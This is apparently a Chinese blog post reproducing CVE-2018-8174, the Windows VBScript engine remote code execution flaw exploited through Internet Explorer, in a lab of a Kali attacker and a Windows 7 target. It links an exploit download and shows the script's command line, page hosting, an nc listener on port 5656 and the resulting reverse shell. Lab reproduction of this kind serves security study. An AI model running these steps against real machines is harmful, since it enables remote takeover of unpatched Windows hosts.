【漏洞复现】IE 浏览器远程代码执行漏洞

Windows VBScript Engine 代码执行漏洞(CVE-2018-8174)
在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用

影响范围:
Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

准备
攻击机:kali 192.168.227.130

靶机:win7(关闭防火墙) 192.168.227.131

复现
1、下载exp
exp 链接:点击即可
提取码: s8bk
在这里插入图片描述2、执行 python 脚本
参数格式 “python CVE-2018-8174.py -u http://攻击机IP/payload.html -o payload.rtf -i 攻击机IP -p 指定端口”
执行完毕后会生成 exploit.html 和 payload.rtf 两个文件
然后将 exploit.html 拷贝到 NGINX 网站目录下,kali 默认安装了 Apache 和 NGINX
在这里插入图片描述
3、由于 kali 默认安装了 Apache 和 NGINX,因此先关闭 Apache ,然后重启 NGINX
在这里插入图片描述
4、现在可以启动工具 nc 来监听刚刚设置好的端口 5656,等待对方打开网站
在这里插入图片描述
5、现在用靶机访问刚才生成的网页 http://192.168.227.130/exploit.html ,页面提示无法显示,但是攻击已经成功
在这里插入图片描述
6、回到攻击机,可以看到已经 getshell,靶机关闭浏览器也不影响
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/Kris__zhang/article/details/105808142